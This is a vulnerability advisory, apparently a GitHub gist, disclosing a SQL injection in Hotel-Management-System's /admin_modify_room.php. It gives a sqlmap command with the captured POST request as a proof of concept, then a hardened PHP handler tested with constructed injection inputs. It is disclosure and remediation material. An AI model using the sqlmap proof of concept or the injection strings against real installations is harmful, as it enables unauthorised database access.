
@topsky979
Created July 20, 2024 14:04

[Description]

Hotel-Management-System was discovered to contain a SQL Injection vulnerability via the URI /admin_modify_room.php.


[Vulnerability Type]

SQL Injection


[Vendor of Product]

Hotel-Management-System, https://github.com/vaibhavverma9999/Hotel-Management-System


[Affected Product Code Base]

commit<=91caab8e505a1791780594d23408fb31fcc272cc


[Impact Escalation of Privileges]

true


[POC] sqlmap commands:

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --batch --banner --flush-session

1.txt (the request file passed to sqlmap with -r):

POST /admin_modify_room.php HTTP/1.1
Host: localhost
Content-Length: 29
Cache-Control: max-age=0
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/confirmed_bookings.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=n99guqnac6hiqno7i7nacd2mnm
Connection: keep-alive

book_id=1&checkout=2024-07-20
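
For remediation, a hardened handler for the two POST fields in the request above, given as an added example that is not code from the Hotel-Management-System repository. It assumes the endpoint updates a booking's checkout date; `update_checkout()`, the `bookings` table and its columns are hypothetical names, and an in-memory SQLite database stands in for the real one so the block runs offline.

```php
<?php
declare(strict_types=1);
// Added example. update_checkout(), the bookings table and its columns are
// hypothetical names; the project's real schema is not shown on this page.
function update_checkout(PDO $db, array $post): bool
{
    // book_id must be a positive integer, otherwise stop before any SQL runs.
    $bookId = filter_var($post['book_id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($bookId === false) {
        return false;
    }
    // checkout must be a strict YYYY-MM-DD string that is also a real calendar date.
    $raw = $post['checkout'] ?? '';
    if (!is_string($raw) || preg_match('/\A\d{4}-\d{2}-\d{2}\z/', $raw) !== 1) {
        return false;
    }
    $date = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    if ($date === false || $date->format('Y-m-d') !== $raw) {
        return false; // e.g. 2024-02-31 rolls over and fails the round trip
    }
    // Values are bound as parameters and never become part of the SQL text.
    $stmt = $db->prepare('UPDATE bookings SET checkout = :checkout WHERE book_id = :id');
    $stmt->bindValue(':checkout', $raw, PDO::PARAM_STR);
    $stmt->bindValue(':id', $bookId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;
}

// Constructed demo data; SQLite is used only to keep the example self-contained.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE bookings (book_id INTEGER PRIMARY KEY, checkout TEXT)');
$db->exec("INSERT INTO bookings VALUES (1, '2024-07-19'), (2, '2024-07-19')");

$cases = [
    'body from 1.txt'            => ['book_id' => '1', 'checkout' => '2024-07-20'],
    'constructed non-integer id' => ['book_id' => '1 OR 1=1', 'checkout' => '2024-07-21'],
    'constructed malformed date' => ['book_id' => '2', 'checkout' => "2024-07-21' -- "],
    'constructed array value'    => ['book_id' => ['1'], 'checkout' => '2024-07-21'],
];
foreach ($cases as $label => $post) {
    echo $label, ': ', update_checkout($db, $post) ? 'updated' : 'rejected', PHP_EOL;
}
// Show the table afterwards so unchanged rows can be confirmed.
foreach ($db->query('SELECT book_id, checkout FROM bookings') as $row) {
    echo $row['book_id'], ' ', $row['checkout'], PHP_EOL;
}
```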

